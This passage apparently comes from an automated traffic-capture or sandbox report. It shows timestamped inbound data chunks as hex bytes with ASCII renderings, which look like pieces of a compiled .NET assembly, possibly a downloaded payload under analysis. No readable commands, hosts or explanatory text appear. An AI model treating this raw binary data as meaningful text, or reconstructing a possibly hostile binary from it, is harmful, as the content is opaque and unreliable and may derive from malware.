                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3249INData Raw: 01 00 06 17 8d 58 00 00 01 25 16 72 72 0d 00 70 a2 17 6f 4c 00 00 0a 0a 73 02 01 00 0a 06 16 9a 06 17 9a 28 63 00 00 0a 28 03 01 00 0a 73 04 01 00 0a 25 06 17 9a 28 63 00 00 0a 73 22 00 00 0a 28 23 00 00 0a 6f 24 00 00 0a 6f 05 01 00 0a 25 06 17 9a 28 63 00 00 0a 6f 06 01 00 0a 28 00 01 00 0a 26 de 05 26 16 0b de 02 17 2a 07 2a 00 00 00 01 10 00 00 00 00 00 00 68 68 00 05 0f 00 00 01 1e 02 28 62 00 00 0a 2a 16 03 16 fe 01 2a 00 00 1b 30 05 00 3c 00 00 00 3d 00 00 11 03 6f ac 01 00 06 17 8d 58 00 00 01 25 16 72 72 0d 00 70 a2 17 6f 4c 00 00 0a 0a 06 17 9a 28 63 00 00 0a 73 02 01 00 0a 06 16 9a 28 07 01 00 0a 28 08 01 00 0a de 03 26 de 00 17 2a 01 10 00 00 00 00 00 00 37 37 00 03 0a 00 00 01 1e 02 28 62 00 00 0a 2a 16 03 19 fe 01 2a 00 00 1b 30 01 00 13 00
                                                                                                                                                                                                  Data Ascii: X%rrpoLs(c(s%(cs"(#o$o%(co(&&**hh(b**0<=oX%rrpoL(cs((&*77(b**0
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3251INData Raw: 02 8c 42 00 00 02 28 23 01 00 0a 6f 24 01 00 0a 0a 16 0b 2b 5b 06 07 9a 0c 08 6f 25 01 00 0a d0 58 00 00 01 28 ba 00 00 0a 28 26 01 00 0a 2c 3c 08 02 8c 42 00 00 02 14 6f 27 01 00 0a 75 58 00 00 01 28 3c 00 00 0a 2c 23 08 02 8c 42 00 00 02 1d 8d 5a 00 00 01 25 d0 a2 00 00 04 28 37 00 00 0a 73 38 00 00 0a 14 6f 28 01 00 0a 07 17 58 0b 07 06 8e 69 32 9f 2a ae 7e 16 00 00 04 25 2d 22 26 73 29 01 00 0a 25 20 ff ff ff 7f 6f 2a 01 00 0a 25 20 ff ff ff 7f 6f 2b 01 00 0a 25 80 16 00 00 04 2a 00 1b 30 02 00 22 00 00 00 43 00 00 11 28 cf 00 00 06 02 6f 3b 00 00 0a 6f 22 00 00 2b 0a de 0d 26 12 01 fe 15 32 00 00 1b 07 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 13 13 00 0d 0f 00 00 01 32 28 cf 00 00 06 02 6f 2d 01 00 0a 2a 00 00 00 13 30 03 00 4a 00 00 00 44 00 00
                                                                                                                                                                                                  Data Ascii: B(#o$+[o%X((&,<Bo'uX(<,#BZ%(7s8o(Xi2*~%-"&s)% o*% o+%*0"C(o;o"+&2*2(o-*0JD
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3252INData Raw: 54 01 00 0a 6f 86 00 00 0a 0c de 31 06 6f 0c 00 00 0a 2d bb de 0a 06 2c 06 06 6f 0b 00 00 0a dc 72 b2 0d 00 70 20 98 3a 00 00 28 d9 00 00 06 0c de 0b de 03 26 de 00 72 2b 02 00 70 2a 08 2a 01 1c 00 00 02 00 8a 00 49 d3 00 0a 00 00 00 00 00 00 00 00 f1 f1 00 03 0f 00 00 01 1b 30 03 00 48 00 00 00 4a 00 00 11 02 28 57 01 00 0a 25 03 6f 58 01 00 0a 6f 59 01 00 0a 6f 5a 01 00 0a 0a 06 73 5b 01 00 0a 0b 07 6f 18 01 00 0a 6f 3b 00 00 0a 0c de 19 07 2c 06 07 6f 0b 00 00 0a dc 06 2c 06 06 6f 0b 00 00 0a dc 26 14 0c de 00 08 2a 01 28 00 00 02 00 1f 00 0e 2d 00 0a 00 00 00 00 02 00 18 00 1f 37 00 0a 00 00 00 00 00 00 00 00 41 41 00 05 0f 00 00 01 6e 02 d0 32 00 00 1b 28 ba 00 00 0a 28 5c 01 00 0a 75 32 00 00 1b a5 32 00 00 1b 2a 13 30 07 00 db 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: To1o-,orp :(&r+p**I0HJ(W%oXoYoZs[oo;,o,o&*(-7AAn2((\u22*0
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3253INData Raw: 00 0a dc de 0a 07 2c 06 07 6f 0b 00 00 0a dc de 0a 06 2c 06 06 6f 0b 00 00 0a dc de 03 26 de 00 7e 1e 00 00 0a 2a 11 04 2a 00 01 40 00 00 00 00 36 00 14 4a 00 03 0a 00 00 01 02 00 28 00 2f 57 00 0a 00 00 00 00 02 00 21 00 42 63 00 0a 00 00 00 00 02 00 1a 00 55 6f 00 0a 00 00 00 00 00 00 00 00 7b 7b 00 03 0a 00 00 01 1b 30 08 00 77 01 00 00 4f 00 00 11 73 a9 00 00 0a 0a 72 29 12 00 70 72 07 0a 00 70 7e 1e 00 00 0a 28 1f 00 00 0a 28 82 01 00 0a 6f 83 01 00 0a 8c 73 00 00 01 72 b2 13 00 70 28 84 01 00 0a 73 73 01 00 0a 0b 07 6f 74 01 00 0a 0c 08 6f 75 01 00 0a 0d 38 f5 00 00 00 09 6f 76 01 00 0a 74 4d 00 00 01 13 04 06 1c 8d 58 00 00 01 25 16 1a 8d 5a 00 00 01 25 d0 da 00 00 04 28 37 00 00 0a 73 38 00 00 0a a2 25 17 11 04 1f 09 8d 5a 00 00 01 25 d0 a4 00 00
                                                                                                                                                                                                  Data Ascii: ,o,o&~**@6J(/W!BcUo{{0wOsr)prp~((osrp(ssotou8ovtMX%Z%(7s8%Z%
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3255INData Raw: 00 0c 00 00 00 00 00 00 00 00 00 00 00 4b 00 00 00 e6 00 00 00 31 01 00 00 03 00 00 00 0a 00 00 01 00 00 00 00 e0 01 00 00 56 00 00 00 36 02 00 00 03 00 00 00 0a 00 00 01 02 00 00 00 d5 01 00 00 6f 00 00 00 44 02 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 cc 01 00 00 86 00 00 00 52 02 00 00 0c 00 00 00 00 00 00 00 02 00 00 00 c3 01 00 00 9d 00 00 00 60 02 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 87 01 00 00 e7 00 00 00 6e 02 00 00 03 00 00 00 0a 00 00 01 00 00 00 00 06 00 00 00 7a 02 00 00 80 02 00 00 03 00 00 00 0f 00 00 01 1b 30 04 00 e6 00 00 00 4f 00 00 11 73 a9 00 00 0a 0a 02 03 28 2b 00 00 0a 10 00 72 cc 13 00 70 72 7d 14 00 70 7e 1e 00 00 0a 28 1f 00 00 0a 28 82 01 00 0a 6f 83 01 00 0a 8c 73 00 00 01 72 b2 13 00 70 28 84 01 00 0a 73 73 01 00 0a 0b
                                                                                                                                                                                                  Data Ascii: K1V6oDR`nz0Os(+rpr}p~((osrp(ss
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3256INData Raw: 0b 00 00 0a dc de 0a 08 2c 06 08 6f 0b 00 00 0a dc de 0a 07 2c 06 07 6f 0b 00 00 0a dc de 03 26 de 00 06 2a 01 40 00 00 00 00 4f 00 7c cb 00 03 0a 00 00 01 02 00 3d 00 9e db 00 0a 00 00 00 00 02 00 36 00 b1 e7 00 0a 00 00 00 00 02 00 2f 00 c4 f3 00 0a 00 00 00 00 00 00 15 00 ea ff 00 03 0a 00 00 01 1b 30 03 00 63 00 00 00 54 00 00 11 28 8d 01 00 0a 2d 07 72 ae 15 00 70 2b 05 72 b6 15 00 70 0a de 09 26 72 be 15 00 70 0a de 00 72 c6 15 00 70 72 20 16 00 70 28 e9 00 00 06 0b 72 c6 15 00 70 72 38 16 00 70 28 e9 00 00 06 26 07 28 26 00 00 0a 2d 0f 07 72 c3 02 00 70 06 28 5f 00 00 0a 0c de 0b de 03 26 de 00 7e 1e 00 00 0a 2a 08 2a 00 01 1c 00 00 00 00 00 00 16 16 00 09 0f 00 00 01 00 00 00 00 58 58 00 03 0f 00 00 01 1b 30 02 00 34 00 00 00 06 00 00 11 7e 7d 01
                                                                                                                                                                                                  Data Ascii: ,o,o&*@O|=6/0cT(-rp+rp&rprpr p(rpr8p(&(&-rp(_&~**XX04~}
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3257INData Raw: 03 7d 23 00 00 04 2a 1e 02 28 62 00 00 0a 2a 1e 02 7b 2a 00 00 04 2a 22 02 03 7d 2a 00 00 04 2a 1e 02 7b 2b 00 00 04 2a 22 02 03 7d 2b 00 00 04 2a 1e 02 28 62 00 00 0a 2a 1e 02 7b 2c 00 00 04 2a 22 02 03 7d 2c 00 00 04 2a 1e 02 7b 2d 00 00 04 2a 22 02 03 7d 2d 00 00 04 2a 1e 02 7b 2e 00 00 04 2a 22 02 03 7d 2e 00 00 04 2a 1e 02 7b 2f 00 00 04 2a 22 02 03 7d 2f 00 00 04 2a 1e 02 7b 30 00 00 04 2a 22 02 03 7d 30 00 00 04 2a 1e 02 7b 31 00 00 04 2a 22 02 03 7d 31 00 00 04 2a 13 30 02 00 68 00 00 00 1b 00 00 11 17 0a 02 28 27 01 00 06 25 2d 04 26 16 2b 08 6f 8e 01 00 0a 16 fe 02 2c 02 16 0a 02 28 2b 01 00 06 25 2d 04 26 16 2b 08 6f 8f 01 00 0a 16 fe 02 2c 02 16 0a 02 28 29 01 00 06 25 2d 04 26 16 2b 08 6f 90 01 00 0a 16 fe 02 2c 02 16 0a 02 28 25 01 00 06 25
                                                                                                                                                                                                  Data Ascii: }#*(b*{**"}**{+*"}+*(b*{,*"},*{-*"}-*{.*"}.*{/*"}/*{0*"}0*{1*"}1*0h('%-&+o,(+%-&+o,()%-&+o,(%%
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3259INData Raw: 2a 1e 02 7b 76 00 00 04 2a 22 02 03 7d 76 00 00 04 2a 1e 02 7b 77 00 00 04 2a 22 02 03 7d 77 00 00 04 2a 1e 02 7b 78 00 00 04 2a 22 02 03 7d 78 00 00 04 2a 1e 02 7b 79 00 00 04 2a 22 02 03 7d 79 00 00 04 2a 1e 02 7b 7a 00 00 04 2a 22 02 03 7d 7a 00 00 04 2a 1e 02 7b 7b 00 00 04 2a 22 02 03 7d 7b 00 00 04 2a 00 00 00 13 30 02 00 80 00 00 00 00 00 00 00 02 73 a9 00 00 0a 7d 6c 00 00 04 02 73 a9 00 00 0a 7d 6d 00 00 04 02 73 a9 00 00 0a 7d 6e 00 00 04 02 73 a9 00 00 0a 7d 6f 00 00 04 02 73 ac 00 00 0a 7d 70 00 00 04 02 73 19 00 00 0a 7d 71 00 00 04 02 73 36 00 00 0a 7d 72 00 00 04 02 73 ab 00 00 0a 7d 73 00 00 04 02 73 aa 00 00 0a 7d 74 00 00 04 02 73 aa 00 00 0a 7d 75 00 00 04 02 73 aa 00 00 0a 7d 76 00 00 04 02 28 62 00 00 0a 2a 1e 02 7b 7c 00 00 04 2a 22
                                                                                                                                                                                                  Data Ascii: *{v*"}v*{w*"}w*{x*"}x*{y*"}y*{z*"}z*{{*"}{*0s}ls}ms}ns}os}ps}qs6}rs}ss}ts}us}v(b*{|*"
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3260INData Raw: af 00 00 04 28 37 00 00 0a 73 38 00 00 0a 72 64 16 00 70 7e 1e 00 00 0a 28 1f 00 00 0a 28 a1 01 00 0a 6f a2 01 00 0a 13 04 2b 39 11 04 6f 0f 00 00 0a 74 2d 00 00 01 13 05 11 05 6f 86 00 00 0a 6f 3b 00 00 0a 13 06 07 6f 86 00 00 0a 11 06 6f 25 00 00 0a 2d 09 07 11 06 6f a3 01 00 0a 26 de 03 26 de 00 11 04 6f 0c 00 00 0a 2d be de 15 11 04 75 16 00 00 01 13 07 11 07 2c 07 11 07 6f 0b 00 00 0a dc de 03 26 de 00 12 02 28 a4 01 00 0a 3a 4a ff ff ff de 0e 12 02 fe 16 44 00 00 1b 6f 0b 00 00 0a dc 02 73 9e 01 00 06 13 08 11 08 28 7b 00 00 0a 07 6f 86 00 00 0a 6f 70 00 00 0a 6f a5 01 00 06 11 08 1f 26 8d 5a 00 00 01 25 d0 e7 00 00 04 28 37 00 00 0a 73 38 00 00 0a 72 72 16 00 70 7e 1e 00 00 0a 28 1f 00 00 0a 6f a1 01 00 06 11 08 7d 0a 01 00 04 02 17 7d 09 01 00 04
                                                                                                                                                                                                  Data Ascii: (7s8rdp~((o+9ot-oo;oo%-o&&o-u,o&(:JDos({oopo&Z%(7s8rrp~(o}}
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3261INData Raw: 22 00 61 1f 7d 28 06 00 9d 2b 1c 19 06 00 16 2c cf 2b 06 00 a0 0c cf 2b 06 00 66 22 cf 2b 06 00 a7 0c cf 2b 22 00 27 3f 7d 28 1a 00 86 3b e7 3c 1a 00 fc 2c de 2c 06 00 a3 2b 1c 19 1a 00 fe 1d de 2c 16 00 d0 27 04 39 26 00 3d 32 d0 3d 26 00 52 2e d0 3d 2f 01 6a 33 00 00 26 00 9a 3c d0 3d 26 00 68 3c d0 3d 2a 00 89 1f 3a 39 2e 00 b3 25 5b 2d 2e 00 7f 25 5b 2d 2e 00 6b 25 5b 2d 16 00 c9 25 dc 2a 16 00 7b 1e dc 2a 16 00 e2 25 dc 2a 06 00 04 22 cf 2b 0a 00 cd 1f 78 30 06 00 6c 28 cf 2b 06 00 a8 2f 1c 19 06 00 84 30 cf 2b 06 00 b3 3a 1c 35 06 00 b0 41 cf 2b 06 00 f5 1f cf 2b 06 00 f1 28 1c 19 06 00 47 20 1c 19 06 00 a5 3f cf 2b 06 00 24 3a cf 2b 06 00 1a 3e cf 2b 8b 01 8f 31 00 00 0e 00 e6 30 43 2b 0e 00 e2 3d 43 2b 0e 00 c3 3f 43 2b 06 00 fb 27 65 40 06 00 43
                                                                                                                                                                                                  Data Ascii: "a}(+,++f"++"'?}(;<,,+,'9&=2=&R.=/j3&<=&h<=*:9.%[-.%[-.k%[-%*{*%*"+x0l(+/0+:5A++(G ?+$:+>+10C+=C+?C+'e@C
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3263INData Raw: 00 1c 00 ef 00 81 00 10 00 7b 32 00 00 29 00 20 00 f8 00 01 00 10 00 2f 0e 00 00 29 00 21 00 fd 00 a1 00 00 00 03 44 00 00 00 00 24 00 04 01 09 01 10 00 e1 1c 00 00 59 01 24 00 1c 01 09 01 10 00 71 43 00 00 59 01 26 00 1c 01 09 01 10 00 66 43 00 00 59 01 29 00 1c 01 01 00 10 00 eb 10 00 00 29 00 2a 00 1c 01 01 00 10 00 5e 11 00 00 29 00 2c 00 21 01 01 00 10 00 30 00 00 00 29 00 32 00 2f 01 01 00 10 00 2c 03 00 00 29 00 39 00 3f 01 01 00 10 00 da 04 00 00 29 00 3d 00 48 01 09 01 10 00 c5 18 00 00 59 01 40 00 4f 01 09 01 10 00 38 19 00 00 59 01 4e 00 52 01 09 01 10 00 eb 18 00 00 59 01 51 00 52 01 09 01 10 00 04 19 00 00 59 01 54 00 53 01 01 01 00 00 37 09 00 00 01 01 56 00 54 01 01 01 00 00 c3 0b 00 00 01 01 59 00 54 01 01 00 10 00 fb 06 00 00 29 00 5f 00
                                                                                                                                                                                                  Data Ascii: {2) /)!D$Y$qCY&fCY))*^),!0)2/,)9?)=HY@O8YNRYQRYTS7VTYT)_
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3264INData Raw: 07 2c 24 11 06 00 0d 3e a6 00 06 00 1f 3f f5 10 01 00 e0 1a a6 00 01 00 0b 1b a6 00 01 00 e0 1a a6 00 01 00 0b 1b a6 00 01 00 36 1b 27 11 01 00 61 1b 30 11 01 00 8c 1b 39 11 01 00 b7 1b 42 11 01 00 e0 1a a6 00 01 00 0b 1b 17 11 01 00 36 1b a6 00 01 00 61 1b 17 11 01 00 8c 1b 24 11 01 00 b7 1b a6 00 01 00 cc 1b a6 00 01 00 e0 1a a6 00 01 00 0b 1b d1 10 01 00 36 1b d1 10 01 00 61 1b a6 00 01 00 e0 1a a6 00 01 00 0b 1b a6 00 01 00 36 1b a6 00 36 00 52 18 d1 10 06 00 b4 26 d1 10 06 00 71 2c d1 10 06 00 32 1e 15 04 06 00 2a 1e d1 10 06 00 aa 19 15 04 06 00 9f 19 d1 10 06 00 8d 27 15 04 06 00 87 27 d1 10 06 00 b1 40 15 04 06 00 a4 40 d1 10 06 00 86 15 d1 10 06 00 6e 19 24 11 06 00 16 38 d1 10 06 00 10 29 d1 10 06 00 57 29 d1 10 06 00 01 3e d1 10 06 10 3e 1a a6
                                                                                                                                                                                                  Data Ascii: ,$>?6'a09B6a$6a66R&q,2*''@@n$8)W)>>
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3265INData Raw: 1a d1 10 36 00 21 11 be 12 16 00 58 01 c3 12 06 00 a7 38 f5 10 36 00 21 11 c8 12 16 00 16 02 cd 12 16 00 94 03 d7 12 06 06 5c 19 d1 10 56 80 30 19 e8 12 56 80 29 19 e8 12 16 00 b6 02 84 12 16 00 cb 03 84 12 16 00 b5 06 ed 12 16 00 a7 08 04 13 36 00 21 11 1d 13 16 00 cd 01 22 13 16 00 6d 03 2a 13 36 00 21 11 34 13 16 00 66 02 30 12 16 00 86 02 39 13 50 20 00 00 00 00 96 00 5f 2f 43 13 01 00 9c 23 00 00 00 00 91 00 d3 34 52 13 02 00 6c 25 00 00 00 00 91 00 3e 2a 5d 13 03 00 08 28 00 00 00 00 91 00 21 39 68 13 04 00 ac 29 00 00 00 00 91 00 c4 34 73 13 05 00 14 2b 00 00 00 00 91 00 b5 19 e2 00 06 00 70 2b 00 00 00 00 91 00 c9 41 29 03 08 00 e0 2c 00 00 00 00 96 00 ac 35 7e 13 09 00 14 2d 00 00 00 00 96 00 1b 2c 91 13 0b 00 b0 2d 00 00 00 00 91 00 e2 38 52 13
                                                                                                                                                                                                  Data Ascii: 6!X86!\V0V)6!"m*6!4f09P _/C#4Rl%>*](!9h)4s+p+A),5~-,-8R
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3267INData Raw: 96 00 98 1d fe 14 91 00 62 4e 00 00 00 00 96 00 81 44 fe 14 94 00 84 4e 00 00 00 00 96 00 b9 44 fe 14 97 00 b2 4e 00 00 00 00 96 00 0c 0c fe 14 9a 00 d4 4e 00 00 00 00 96 00 ef 09 fe 14 9d 00 f6 4e 00 00 00 00 96 00 fd 0b fe 14 a0 00 20 4f 00 00 00 00 96 00 e1 09 fe 14 a3 00 68 4f 00 00 00 00 96 00 94 44 fe 14 a6 00 c1 4f 00 00 00 00 96 00 d3 09 fe 14 a9 00 f1 4f 00 00 00 00 96 00 74 44 fe 14 ac 00 1c 50 00 00 00 00 96 00 fd 09 fe 14 af 00 88 50 00 00 00 00 96 00 a5 44 fe 14 b2 00 be 50 00 00 00 00 96 00 f5 0b fe 14 b5 00 f8 50 00 00 00 00 96 00 d4 1d fe 14 b8 00 50 51 00 00 00 00 86 18 f0 33 01 00 bb 00 0c 53 00 00 00 00 c6 00 03 1d e4 14 bb 00 18 53 00 00 00 00 96 00 be 09 f1 14 be 00 b0 54 00 00 00 00 96 00 e4 1f 02 0f c1 00 30 55 00 00 00 00 96 00 cf
                                                                                                                                                                                                  Data Ascii: bNDNDNNN OhODOOtDPPDPPPQ3SST0U
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3268INData Raw: 00 00 00 e6 01 68 3b ff 15 42 01 1c 82 00 00 00 00 86 18 f0 33 01 00 43 01 24 82 00 00 00 00 e6 01 98 2d f8 15 43 01 2c 82 00 00 00 00 e6 01 68 3b ff 15 44 01 84 82 00 00 00 00 86 18 f0 33 01 00 45 01 00 00 00 00 00 00 c6 05 98 2d f8 15 45 01 00 00 00 00 00 00 c6 05 68 3b ff 15 46 01 8c 82 00 00 00 00 e6 01 98 2d f8 15 47 01 94 82 00 00 00 00 e6 01 68 3b ff 15 48 01 c4 82 00 00 00 00 86 18 f0 33 01 00 49 01 cc 82 00 00 00 00 86 18 f0 33 06 16 49 01 50 83 00 00 00 00 86 08 80 3d 0d 16 4a 01 58 83 00 00 00 00 86 00 7d 37 13 16 4a 01 7c 84 00 00 00 00 96 00 36 20 3a 02 4b 01 0c 85 00 00 00 00 96 00 95 40 29 03 4c 01 8c 85 00 00 00 00 96 00 f9 21 23 16 4d 01 a3 85 00 00 00 00 96 00 8c 37 29 03 4e 01 b8 85 00 00 00 00 96 00 12 3c 2a 16 4f 01 e8 86 00 00 00 00
                                                                                                                                                                                                  Data Ascii: h;B3C$-C,h;D3E-Eh;F-Gh;H3I3IP=JX}7J|6 :K@)L!#M7)N<*O
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3269INData Raw: 79 a1 00 00 00 00 86 08 d2 06 c9 00 8c 01 81 a1 00 00 00 00 86 08 da 06 10 00 8c 01 8a a1 00 00 00 00 86 18 f0 33 01 00 8d 01 92 a1 00 00 00 00 86 08 47 04 c9 00 8d 01 9a a1 00 00 00 00 86 08 4f 04 10 00 8d 01 a3 a1 00 00 00 00 86 08 d2 06 c9 00 8e 01 ab a1 00 00 00 00 86 08 da 06 10 00 8e 01 b4 a1 00 00 00 00 86 08 b5 08 cd 16 8f 01 bc a1 00 00 00 00 86 08 bd 08 d7 16 8f 01 c5 a1 00 00 00 00 86 08 13 0b e2 16 90 01 cd a1 00 00 00 00 86 08 1b 0b ec 16 90 01 d6 a1 00 00 00 00 86 08 b0 0c f7 16 91 01 de a1 00 00 00 00 86 08 b8 0c 01 17 91 01 e7 a1 00 00 00 00 86 08 12 0e 0c 17 92 01 ef a1 00 00 00 00 86 08 1a 0e 16 17 92 01 f8 a1 00 00 00 00 86 00 f5 0e 1b 00 93 01 6c a2 00 00 00 00 86 18 f0 33 01 00 93 01 74 a2 00 00 00 00 86 18 f0 33 01 00 93 01 7c a2 00
                                                                                                                                                                                                  Data Ascii: y3GOl3t3|
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3271INData Raw: 17 bd 01 99 a6 00 00 00 00 86 08 56 11 a4 17 bd 01 a2 a6 00 00 00 00 86 08 1e 00 9a 17 be 01 aa a6 00 00 00 00 86 08 27 00 a4 17 be 01 b3 a6 00 00 00 00 86 08 1a 03 9a 17 bf 01 bb a6 00 00 00 00 86 08 23 03 a4 17 bf 01 c4 a6 00 00 00 00 86 08 c8 04 70 17 c0 01 cc a6 00 00 00 00 86 08 d1 04 7a 17 c0 01 d5 a6 00 00 00 00 86 08 2c 07 9a 17 c1 01 dd a6 00 00 00 00 86 08 35 07 a4 17 c1 01 e6 a6 00 00 00 00 86 08 25 09 9a 17 c2 01 ee a6 00 00 00 00 86 08 2e 09 a4 17 c2 01 f7 a6 00 00 00 00 86 08 b1 0b 9a 17 c3 01 ff a6 00 00 00 00 86 08 ba 0b a4 17 c3 01 08 a7 00 00 00 00 86 08 e5 0c 9a 17 c4 01 10 a7 00 00 00 00 86 08 ee 0c a4 17 c4 01 1c a7 00 00 00 00 86 18 f0 33 01 00 c5 01 a8 a7 00 00 00 00 86 08 47 04 c9 00 c5 01 b0 a7 00 00 00 00 86 08 4f 04 10 00 c5 01
                                                                                                                                                                                                  Data Ascii: V'#pz,5%.3GO
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3272INData Raw: 03 0e 22 18 e9 01 96 aa 00 00 00 00 83 00 bc 10 2d 18 ea 01 a1 aa 00 00 00 00 91 18 14 34 e0 14 eb 01 ad aa 00 00 00 00 86 18 f0 33 01 00 eb 01 b5 aa 00 00 00 00 83 00 61 01 07 18 eb 01 00 00 00 00 03 00 86 18 f0 33 74 00 ec 01 00 00 00 00 03 00 c6 01 b4 1f a3 13 ee 01 00 00 00 00 03 00 c6 01 af 1f 38 18 f2 01 00 00 00 00 03 00 c6 01 a5 1f 45 18 f8 01 00 00 00 00 03 00 86 18 f0 33 74 00 fa 01 00 00 00 00 03 00 c6 01 b4 1f ac 13 fc 01 00 00 00 00 03 00 c6 01 af 1f 4d 18 fe 01 00 00 00 00 03 00 c6 01 a5 1f 57 18 02 02 00 00 00 00 03 00 86 18 f0 33 74 00 03 02 00 00 00 00 03 00 c6 01 b4 1f cc 13 05 02 00 00 00 00 03 00 c6 01 af 1f 5d 18 0b 02 00 00 00 00 03 00 c6 01 a5 1f 6d 18 13 02 00 00 00 00 03 00 86 18 f0 33 74 00 15 02 00 00 00 00 03 00 c6 01 b4 1f d8
                                                                                                                                                                                                  Data Ascii: "-43a3t8E3tMW3t]m3t
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3273INData Raw: 27 00 00 02 00 6d 31 00 00 03 00 6e 1e 00 00 01 00 9f 27 00 00 02 00 4e 42 02 00 03 00 e6 41 00 00 01 00 9f 27 00 00 02 00 64 21 00 00 01 00 44 3c 00 00 01 00 91 19 00 00 02 00 c3 21 10 10 03 00 c0 42 00 00 01 00 91 19 00 00 02 00 c3 21 10 10 03 00 c0 42 00 00 01 00 3a 1e 00 00 01 00 65 3c 00 00 01 00 44 40 00 00 02 00 db 41 00 00 01 00 3f 34 00 00 01 00 d5 37 00 00 01 00 8b 0a 00 00 02 00 db 41 00 00 01 00 bb 3b 00 00 01 00 bb 3b 00 00 01 00 b5 3d 02 00 01 00 4c 38 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00 01 00 b5 3d 00 00
                                                                                                                                                                                                  Data Ascii: 'm1n'NBA'd!D<!B!B:e<D@A?47A;;=L8================
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3275INData Raw: 00 00 01 00 9f 28 00 00 02 00 79 2f 00 00 01 00 9f 28 00 00 02 00 79 2f 00 00 01 00 9f 28 00 00 02 00 79 2f 00 00 01 00 9f 28 00 00 02 00 79 2f 00 00 01 00 9f 28 00 00 02 00 79 2f 00 00 01 00 98 20 00 00 01 00 3c 41 00 00 02 00 77 20 00 00 01 00 28 3d 00 00 01 00 81 20 00 00 01 00 28 3d 00 00 01 00 0f 2c 00 00 02 00 f3 1c 00 00 01 00 31 41 00 00 02 00 5e 27 00 00 01 00 21 41 00 00 01 00 21 41 00 00 02 00 1a 41 00 00 01 00 8e 26 00 00 01 00 75 41 00 00 02 00 2d 27 00 00 01 00 b5 2d 00 00 01 00 5d 2a 00 00 01 00 b5 2d 00 00 01 00 5d 2a 00 00 01 00 b5 2d 00 00 01 00 5d 2a 00 00 01 00 b5 2d 00 00 01 00 5d 2a 00 00 01 00 b5 2d 00 00 01 00 5d 2a 00 00 01 00 b5 3d 00 00 01 00 c5 38 00 00 01 00 60 21 00 00 01 00 60 21 00 00 01 00 98 38 00 00 01 00 8e 26 00 00 01
                                                                                                                                                                                                  Data Ascii: (y/(y/(y/(y/(y/ <Aw (= (=,1A^'!A!AA&uA-'-]*-]*-]*-]*-]*=8`!`!8&
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3276INData Raw: 00 05 00 8b 3d 00 00 06 00 1e 38 00 00 01 00 7d 3c 00 20 02 00 68 44 00 00 03 00 53 40 00 00 04 00 4a 40 00 00 05 00 8b 3d 00 00 06 00 1e 38 00 00 07 00 18 2a 00 00 08 00 c3 3c 00 00 01 00 8b 3d 00 00 02 00 b5 3d 00 00 01 00 c3 3c 00 00 02 00 46 1d 00 00 01 00 7d 3c 00 20 02 00 68 44 00 00 03 00 3c 40 00 00 04 00 34 40 00 00 05 00 16 38 00 00 01 00 7d 3c 00 20 02 00 68 44 00 00 03 00 3c 40 00 00 04 00 34 40 00 00 05 00 16 38 00 00 06 00 18 2a 00 00 07 00 c3 3c 00 00 01 00 b5 3d 00 00 01 00 c3 3c 00 00 02 00 46 1d 00 00 01 00 e5 2b 00 00 02 00 f6 41 00 20 03 00 ed 21 02 00 04 00 e5 41 00 00 05 00 b7 3c 00 00 06 00 ab 3c 00 00 07 00 3c 40 00 00 08 00 34 40 00 00 09 00 16 38 00 00 01 00 e5 2b 00 00 02 00 f6 41 00 20 03 00 ed 21 02 00 04 00 e5 41 00 00 05 00
                                                                                                                                                                                                  Data Ascii: =8}< hDS@J@=8*<==<F}< hD<@4@8}< hD<@4@8*<=<F+A !A<<<@4@8+A !A
                                                                                                                                                                                                  2021-11-18 09:30:37 UTC3280INData Raw: 23 0a 43 00 07 10 29 0a b3 00 8a 1a 43 0a 43 00 07 10 49 0a b3 00 5a 1a 63 0a 43 00 07 10 69 0a b3 00 6a 1a 83 0a 43 00 07 10 89 0a b3 00 7a 1a a3 0a 43 00 07 10 a9 0a b3 00 8a 1a c3 0a 43 00 07 10 c9 0a b3 00 9a 1a e1 0a ab 00 07 10 e3 0a 43 00 07 10 e9 0a b3 00 aa 1a 01 0b ab 00 07 10 03 0b 43 00 07 10 09 0b b3 00 ba 1a 23 0b 43 00 07 10 29 0b b3 00 ca 1a 41 0b ab 00 e9 1b 49 0b b3 00 da 1a 61 0b ab 00 f8 1b 63 0b 43 00 07 10 69 0b b3 00 ea 1a 81 0b ab 00 07 1c 83 0b 43 00 07 10 89 0b b3 00 fb 1a a1 0b ab 00 16 1c a3 0b 43 00 07 10 a9 0b b3 00 0c 1b c1 0b ab 00 25 1c c9 0b b3 00 1d 1b e1 0b 43 00 07 10 e9 0b b3 00 2e 1b 01 0c 43 00 07 10 09 0c b3 00 3f 1b 21 0c 43 00 07 10 29 0c b3 00 9c 1f 41 0c 43 00 07 10 49 0c b3 00 b1 1f 61 0c 43 00 07 10 81 0c 43
                                                                                                                                                                                                  Data Ascii: #C)CCIZcCijCzCCCC#C)AIacCiCC%C.C?!C)ACIaCC
